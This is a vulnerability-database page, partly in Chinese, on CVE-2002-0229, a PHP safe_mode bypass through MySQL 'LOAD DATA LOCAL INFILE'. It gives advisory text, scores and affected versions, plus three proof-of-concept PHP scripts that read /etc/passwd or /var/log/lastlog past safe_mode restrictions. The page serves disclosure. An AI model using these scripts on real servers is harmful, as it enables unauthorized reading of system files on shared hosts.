CVE-2002-0229
CVSS7.5
发布时间 :2002-05-16 00:00:00
修订时间 :2016-10-17 22:17:15
NMCOES    

[原文]Safe Mode feature (safe_mode) in PHP 3.0 through 4.1.0 allows attackers with access to the MySQL database to bypass Safe Mode access restrictions and read arbitrary files using "LOAD DATA INFILE LOCAL" SQL statements.


[CNNVD]PHP MySQL绕过安全模式访问限制漏洞(CNNVD-200205-033)

        
        PHP是种Server端嵌入式脚本语言,适用于Windows、Linux和许多Unix变体。它常用于WEB开发,提供了非常灵活的配置。
        从PHP 3.0开始支持安全模式。在该模式下,PHP脚本功能受到极大限制,只能通过一个封装函数访问本地文件系统。可以在配置中指定允许访问(读、写、执行)哪些文件,并由封装函数进行这项检查。
        但是PHP携带的MySQL Library实现"LOAD DATA LOCAL INFILE"时没有使用封装函数,攻击者可以通过MySQL绕过安全模式的访问限制。攻击者可以上传一个PHP文件,这个PHP文件运行时会连接到一个MySQL数据库,然后调用"LOAD DATA LOCAL INFILE"命令来获取PHP所在服务器上的某些文件内容,对于提供虚拟主机服务的大型ISP,该问题尤其严重。
        PostgreSQL和其它PHP数据库扩展很可能存在类似问题。只不过PHP缺省支持MySQL。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:php:php:4.0.1PHP PHP 4.0.1
cpe:/a:php:php:4.1.0PHP PHP 4.1.0
cpe:/a:php:php:4.0.3PHP PHP 4.0.3
cpe:/a:php:php:4.1.2PHP PHP 4.1.2
cpe:/a:php:php:3.0.16PHP PHP 3.0.16
cpe:/a:php:php:3.0.8PHP PHP 3.0.8
cpe:/a:php:php:3.0.7PHP PHP 3.0.7
cpe:/a:php:php:3.0.6PHP PHP 3.0.6
cpe:/a:php:php:3.0.5PHP PHP 3.0.5
cpe:/a:php:php:3.0.9PHP PHP 3.0.9
cpe:/a:php:php:3.0.12PHP PHP 3.0.12
cpe:/a:php:php:3.0.4PHP PHP 3.0.4
cpe:/a:php:php:3.0.13PHP PHP 3.0.13
cpe:/a:php:php:3.0.3PHP PHP 3.0.3
cpe:/a:php:php:4.0
cpe:/a:php:php:4.0.1:patch2
cpe:/a:php:php:3.0PHP PHP 3.0
cpe:/a:php:php:3.0.10PHP PHP 3.0.10
cpe:/a:php:php:3.0.2PHP PHP 3.0.2
cpe:/a:php:php:3.0.1PHP PHP 3.0.1
cpe:/a:php:php:3.0.11PHP PHP 3.0.11
cpe:/a:php:php:4.0.5PHP PHP 4.0.5
cpe:/a:php:php:4.0.4PHP PHP 4.0.4
cpe:/a:php:php:4.0.6PHP PHP 4.0.6

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0229
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0229
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-033
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=101286577109716&w=2
(UNKNOWN)  BUGTRAQ  20020203 PHP Safe Mode Filesystem Circumvention Problem
http://marc.info/?l=bugtraq&m=101304702002321&w=2
(UNKNOWN)  BUGTRAQ  20020206 DW020203-PHP clarification
http://marc.info/?l=ntbugtraq&m=101285016125377&w=2
(UNKNOWN)  NTBUGTRAQ  20020203 PHP Safe Mode Filesystem Circumvention Problem
http://marc.info/?l=ntbugtraq&m=101303065423534&w=2
(UNKNOWN)  NTBUGTRAQ  20020205 Re: PHP Safe Mode Filesystem Circumvention Problem
http://marc.info/?l=ntbugtraq&m=101303819613337&w=2
(UNKNOWN)  NTBUGTRAQ  20020206 DW020203-PHP clarification
http://www.iss.net/security_center/static/8105.php
(VENDOR_ADVISORY)  XF  php-mysql-safemode-bypass(8105)
http://www.securityfocus.com/bid/4026
(UNKNOWN)  BID  4026

- 漏洞信息

PHP MySQL绕过安全模式访问限制漏洞
高危 访问验证错误
2002-05-16 00:00:00 2005-10-20 00:00:00
远程※本地  
        
        PHP是种Server端嵌入式脚本语言,适用于Windows、Linux和许多Unix变体。它常用于WEB开发,提供了非常灵活的配置。
        从PHP 3.0开始支持安全模式。在该模式下,PHP脚本功能受到极大限制,只能通过一个封装函数访问本地文件系统。可以在配置中指定允许访问(读、写、执行)哪些文件,并由封装函数进行这项检查。
        但是PHP携带的MySQL Library实现"LOAD DATA LOCAL INFILE"时没有使用封装函数,攻击者可以通过MySQL绕过安全模式的访问限制。攻击者可以上传一个PHP文件,这个PHP文件运行时会连接到一个MySQL数据库,然后调用"LOAD DATA LOCAL INFILE"命令来获取PHP所在服务器上的某些文件内容,对于提供虚拟主机服务的大型ISP,该问题尤其严重。
        PostgreSQL和其它PHP数据库扩展很可能存在类似问题。只不过PHP缺省支持MySQL。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用PHP safe_mode来禁止MySQL客户端库的使用。
        厂商补丁:
        PHP
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.php.net

- 漏洞信息 (21264)

PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (1) (EDBID:21264)
php remote
2002-02-03 Verified
0 Dave Wilson
N/A [点击下载]
source: http://www.securityfocus.com/bid/4026/info

PHP's 'safe_mode' feature may be used to restrict access to certain areas of a filesystem by PHP scripts. However, a problem has been discovered that may allow an attacker to bypass these restrictions to gain unauthorized access to areas of the filesystem that are restricted when PHP 'safe_mode' is enabled. 

In particular, the MySQL client library that ships with PHP fails to properly honor 'safe_mode'. As a result, a user can issue a LOAD DATA statement to read files that reside in restricted areas of the filesystem (as determined by 'safe_mode').

<?

/*
   PHP Safe Mode Problem

   This script will connect to a database server running locally or
otherwise,
   create a temporary table with one column, use the LOAD DATA statement
to
   read a (possibly binary) file, then reads it back to the client.

   Any type of file may pass through this 'proxy'. Although unrelated,
this
   may also be used to access files on the DB server (although they must
be
   world-readable or in MySQLd's basedir, according to docs).
*/


$host = 'localhost';
$user = 'root';
$pass = 'letmein';
$db   = 'test_database';

$filename = '/var/log/lastlog';     /* File to grab from [local] server */
$local = true;                      /* Read from local filesystem */

$local = $local ? 'LOCAL' : '';


$sql = array (
   "USE $db",

   'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',

   "LOAD DATA $local INFILE '$filename' INTO TABLE $tbl FIELDS "
   . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
   . "ESCAPED BY          '' "
   . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",

   "SELECT a FROM $tbl LIMIT 1"
);

Header ('Content-type: text/plain');

mysql_connect ($host, $user, $pass);

foreach ($sql as $statement) {
   $q = mysql_query ($statement);

   if ($q == false) die (
      "FAILED: " . $statement . "\n" .
      "REASON: " . mysql_error () . "\n"
   );

   if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;

   echo $r [0];
   mysql_free_result ($q);
}		

- 漏洞信息 (21265)

PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (2) (EDBID:21265)
php remote
2002-02-03 Verified
0 Anonymous
N/A [点击下载]
source: http://www.securityfocus.com/bid/4026/info
 
PHP's 'safe_mode' feature may be used to restrict access to certain areas of a filesystem by PHP scripts. However, a problem has been discovered that may allow an attacker to bypass these restrictions to gain unauthorized access to areas of the filesystem that are restricted when PHP 'safe_mode' is enabled.
 
In particular, the MySQL client library that ships with PHP fails to properly honor 'safe_mode'. As a result, a user can issue a LOAD DATA statement to read files that reside in restricted areas of the filesystem (as determined by 'safe_mode').

<?php

file_get_contents('/etc/passwd');

$l = mysql_connect("localhost", "root");
mysql_query("CREATE DATABASE a");
mysql_query("CREATE TABLE a.a (a varchar(1024))");
mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'");
mysql_close($l); mysql_connect("localhost", "aaaa");

mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");

$result = mysql_query("SELECT a FROM a.a");
while(list($row) = mysql_fetch_row($result))
    print $row . chr(10);

?>		

- 漏洞信息 (21266)

PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (3) (EDBID:21266)
php remote
2002-02-03 Verified
0 Anonymous
N/A [点击下载]
source: http://www.securityfocus.com/bid/4026/info
 
PHP's 'safe_mode' feature may be used to restrict access to certain areas of a filesystem by PHP scripts. However, a problem has been discovered that may allow an attacker to bypass these restrictions to gain unauthorized access to areas of the filesystem that are restricted when PHP 'safe_mode' is enabled.
 
In particular, the MySQL client library that ships with PHP fails to properly honor 'safe_mode'. As a result, a user can issue a LOAD DATA statement to read files that reside in restricted areas of the filesystem (as determined by 'safe_mode').

<?php

function r($fp, &$buf, $len, &$err) {
      print fread($fp, $len);
}

$m = new mysqli('localhost', 'aaaa', '', 'a');
$m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
$m->set_local_infile_handler("r");
$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");
$m->close();

?>		

- 漏洞信息

9912
PHP safe_mode MySQL Database Access Restriction Bypass

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-02-03 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

PHP MySQL Safe_Mode Filesystem Circumvention Vulnerability
Access Validation Error 4026
Yes Yes
2002-02-03 12:00:00 2007-09-11 11:51:00
Dave Wilson <dw@dahomelands.net> is credited with the discovery of this issue.

- 受影响的程序版本

PHP PHP 5.2.3
PHP PHP 5.2.2
PHP PHP 5.2.1
+ Ubuntu Ubuntu Linux 7.04 sparc
+ Ubuntu Ubuntu Linux 7.04 powerpc
+ Ubuntu Ubuntu Linux 7.04 i386
+ Ubuntu Ubuntu Linux 7.04 amd64
PHP PHP 5.1.6
+ Ubuntu Ubuntu Linux 6.10 sparc
+ Ubuntu Ubuntu Linux 6.10 powerpc
+ Ubuntu Ubuntu Linux 6.10 i386
+ Ubuntu Ubuntu Linux 6.10 amd64
PHP PHP 5.1.5
PHP PHP 5.1.4
PHP PHP 5.1.3 -RC1
PHP PHP 5.1.3
PHP PHP 5.1.2
+ Ubuntu Ubuntu Linux 6.06 LTS sparc
+ Ubuntu Ubuntu Linux 6.06 LTS powerpc
+ Ubuntu Ubuntu Linux 6.06 LTS i386
+ Ubuntu Ubuntu Linux 6.06 LTS amd64
PHP PHP 5.1.1
PHP PHP 5.1
PHP PHP 5.0.5
PHP PHP 5.0.4
PHP PHP 5.0.3
+ Trustix Secure Linux 2.2
PHP PHP 5.0.2
PHP PHP 5.0.1
PHP PHP 5.0 candidate 3
PHP PHP 5.0 candidate 2
PHP PHP 5.0 candidate 1
PHP PHP 5.0 .0
PHP PHP 4.4.7
- Slackware Linux 10.2
- Slackware Linux 11.0
- Slackware Linux -current
PHP PHP 4.4.6
PHP PHP 4.4.5
PHP PHP 4.4.4
PHP PHP 4.4.3
PHP PHP 4.4.2
PHP PHP 4.4.1
PHP PHP 4.4 .0
PHP PHP 4.3.11
PHP PHP 4.3.10
+ Gentoo Linux
+ Red Hat Fedora Core3
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
+ Trustix Secure Linux 1.5
PHP PHP 4.3.9
PHP PHP 4.3.8
+ Mandriva Linux Mandrake 10.1 x86_64
+ Mandriva Linux Mandrake 10.1
+ S.u.S.E. Linux Personal 9.2
+ Turbolinux Turbolinux Server 10.0
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
PHP PHP 4.3.7
PHP PHP 4.3.6
PHP PHP 4.3.5
PHP PHP 4.3.4
+ MandrakeSoft Corporate Server 3.0 x86_64
+ MandrakeSoft Corporate Server 3.0
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
+ S.u.S.E. Linux Personal 9.1
PHP PHP 4.3.3
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ Turbolinux Home
+ Turbolinux Turbolinux 10 F...
+ Turbolinux Turbolinux Desktop 10.0
PHP PHP 4.3.2
PHP PHP 4.3.1
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ OpenPKG OpenPKG Current
+ S.u.S.E. Linux Personal 8.2
PHP PHP 4.3
PHP PHP 4.2.3
+ EnGarde Secure Linux 1.0.1
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
PHP PHP 4.2.2
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.2
+ OpenPKG OpenPKG 1.1
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
+ S.u.S.E. Linux 8.1
PHP PHP 4.2.1
- FreeBSD FreeBSD 4.6
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3
+ Slackware Linux 8.1
PHP PHP 4.2 .0
PHP PHP 4.2 -dev
PHP PHP 4.1.2
+ Apple Mac OS X 10.1.5
+ Apple Mac OS X 10.1.4
+ Apple Mac OS X 10.1.3
+ Apple Mac OS X 10.1.2
+ Apple Mac OS X 10.1.1
+ Apple Mac OS X 10.1
+ Apple Mac OS X 10.1
+ Apple Mac OS X 10.0.4
+ Apple Mac OS X 10.0.3
+ Apple Mac OS X 10.0.2
+ Apple Mac OS X 10.0.1
+ Apple Mac OS X 10.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ MandrakeSoft Multi Network Firewall 2.0
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
PHP PHP 4.1.1
+ Conectiva Linux 7.0
PHP PHP 4.1 .0
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
PHP PHP 4.0.7 RC3
PHP PHP 4.0.7 RC2
PHP PHP 4.0.7 RC1
PHP PHP 4.0.7
PHP PHP 4.0.6
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ HP Secure OS software for Linux 1.0
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- IBM AIX 4.3
- IBM AIX 5.1
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 7.0
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
+ Sun Cobalt RaQ 550
+ Sun LX50
+ Trustix Secure Linux 1.5
PHP PHP 4.0.5
PHP PHP 4.0.4
+ Compaq Compaq Secure Web Server PHP 1.0
+ Conectiva Linux 6.0
+ Guardian Digital Engarde Secure Linux 1.0.1
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0
PHP PHP 4.0.3 pl1
+ S.u.S.E. Linux 6.4 ppc
+ S.u.S.E. Linux 6.4 i386
+ S.u.S.E. Linux 6.4 alpha
+ S.u.S.E. Linux 6.4
PHP PHP 4.0.3
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ Sun Cobalt Control Station 4100CS
+ Sun Cobalt Qube3 Japanese 4000WGJ
+ Sun Cobalt Qube3 Japanese w/ Caching and RAID 4100WGJ
+ Sun Cobalt Qube3 Japanese w/Caching 4010WGJ
+ Sun Cobalt RaQ XTR 3500R
+ Sun Cobalt RaQ XTR Japanese 3500R-ja
PHP PHP 4.0.2
PHP PHP 4.0.1 pl2
PHP PHP 4.0.1 pl1
PHP PHP 4.0.1
+ Sun Cobalt Qube3 4000WG
+ Sun Cobalt Qube3 w/ Caching and RAID 4100WG
+ Sun Cobalt Qube3 w/Caching 4010WG
+ Sun Cobalt RaQ4 3001R
+ Sun Cobalt RaQ4 Japanese RAID 3100R-ja
+ Sun Cobalt RaQ4 RAID 3100R
PHP PHP 4.0 0
PHP PHP 3.0.18
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux graficas
+ Conectiva Linux ecommerce
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ Red Hat Linux 6.2
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
PHP PHP 3.0.17
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
PHP PHP 3.0.16
PHP PHP 3.0.15
PHP PHP 3.0.14
PHP PHP 3.0.13
PHP PHP 3.0.12
PHP PHP 3.0.11
PHP PHP 3.0.10
PHP PHP 3.0.9
PHP PHP 3.0.8
PHP PHP 3.0.7
+ Sun 2800 Workgroup NTT/KOBE 2800WGJ-KOBE
PHP PHP 3.0.6
PHP PHP 3.0.5
PHP PHP 3.0.4
PHP PHP 3.0.3
PHP PHP 3.0.2
PHP PHP 3.0.1
PHP PHP 3.0 0
PHP PHP 3.0 .16
+ S.u.S.E. Linux 6.4 ppc
+ S.u.S.E. Linux 6.4 i386
+ S.u.S.E. Linux 6.4 alpha
+ S.u.S.E. Linux 6.4
PHP PHP 3.0 .13
PHP PHP 3.0 .12
PHP PHP 3.0 .11
PHP PHP 3.0 .10
PHP PHP 5.2
+ Debian Linux 4.0 sparc
+ Debian Linux 4.0 s/390
+ Debian Linux 4.0 powerpc
+ Debian Linux 4.0 mipsel
+ Debian Linux 4.0 mips
+ Debian Linux 4.0 m68k
+ Debian Linux 4.0 ia-64
+ Debian Linux 4.0 ia-32
+ Debian Linux 4.0 hppa
+ Debian Linux 4.0 arm
+ Debian Linux 4.0 amd64
+ Debian Linux 4.0 alpha
+ Debian Linux 4.0
PHP PHP 5.2.4

- 不受影响的程序版本

PHP PHP 5.2.4

- 漏洞讨论

PHP's 'safe_mode' feature may be used to restrict access to certain areas of a filesystem by PHP scripts. However, a problem has been discovered that may allow an attacker to bypass these restrictions to gain unauthorized access to areas of the filesystem that are restricted when PHP 'safe_mode' is enabled.

In particular, the MySQL client library that ships with PHP fails to properly honor 'safe_mode'. As a result, a user can issue a LOAD DATA statement to read files that reside in restricted areas of the filesystem (as determined by 'safe_mode').

- 漏洞利用

The 'safemodexploit.php' example was submitted by Dave Wilson <dw@dahomelands.net>:

The script will (when configured correctly) attempt to read '/var/log/lastlog' via the SQL daemon and return it to the client.

$ cp safe_mode.php /www
$ wget -qO lastlog_via_mysql localhost/safe_mode.php
$ diff /var/log/lastlog lastlog_via_mysql; echo $?
0

- 解决方案

The vendor has released PHP 5.2.4 to address this issue. Please see the references for more information.


PHP PHP 5.2

PHP PHP 3.0 .13

PHP PHP 3.0 .11

PHP PHP 3.0 0

PHP PHP 3.0 .10

PHP PHP 3.0 .12

PHP PHP 3.0 .16

PHP PHP 3.0.1

PHP PHP 3.0.10

PHP PHP 3.0.11

PHP PHP 3.0.12

PHP PHP 3.0.13

PHP PHP 3.0.14

PHP PHP 3.0.15

PHP PHP 3.0.16

PHP PHP 3.0.17

PHP PHP 3.0.18

PHP PHP 3.0.2

PHP PHP 3.0.3

PHP PHP 3.0.4

PHP PHP 3.0.5

PHP PHP 3.0.6

PHP PHP 3.0.7

PHP PHP 3.0.8

PHP PHP 3.0.9

PHP PHP 4.0 0

PHP PHP 4.0.1

PHP PHP 4.0.1 pl1

PHP PHP 4.0.1 pl2

PHP PHP 4.0.2

PHP PHP 4.0.3 pl1

PHP PHP 4.0.3

PHP PHP 4.0.4

PHP PHP 4.0.5

PHP PHP 4.0.6

PHP PHP 4.0.7

PHP PHP 4.0.7 RC1

PHP PHP 4.0.7 RC3

PHP PHP 4.0.7 RC2

PHP PHP 4.1 .0

PHP PHP 4.1.1

PHP PHP 4.1.2

PHP PHP 4.2 -dev

PHP PHP 4.2 .0

PHP PHP 4.2.1

PHP PHP 4.2.2

PHP PHP 4.2.3

PHP PHP 4.3

PHP PHP 4.3.1

PHP PHP 4.3.10

PHP PHP 4.3.11

PHP PHP 4.3.2

PHP PHP 4.3.3

PHP PHP 4.3.4

PHP PHP 4.3.5

PHP PHP 4.3.6

PHP PHP 4.3.7

PHP PHP 4.3.8

PHP PHP 4.3.9

PHP PHP 4.4 .0

PHP PHP 4.4.1

PHP PHP 4.4.2

PHP PHP 4.4.3

PHP PHP 4.4.4

PHP PHP 4.4.5

PHP PHP 4.4.6

PHP PHP 4.4.7

PHP PHP 5.0 .0

PHP PHP 5.0 candidate 2

PHP PHP 5.0 candidate 3

PHP PHP 5.0 candidate 1

PHP PHP 5.0.1

PHP PHP 5.0.2

PHP PHP 5.0.3

PHP PHP 5.0.4

PHP PHP 5.0.5

PHP PHP 5.1

PHP PHP 5.1.1

PHP PHP 5.1.2

PHP PHP 5.1.3 -RC1

PHP PHP 5.1.3

PHP PHP 5.1.4

PHP PHP 5.1.5

PHP PHP 5.1.6

PHP PHP 5.2.1

PHP PHP 5.2.2

PHP PHP 5.2.3

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站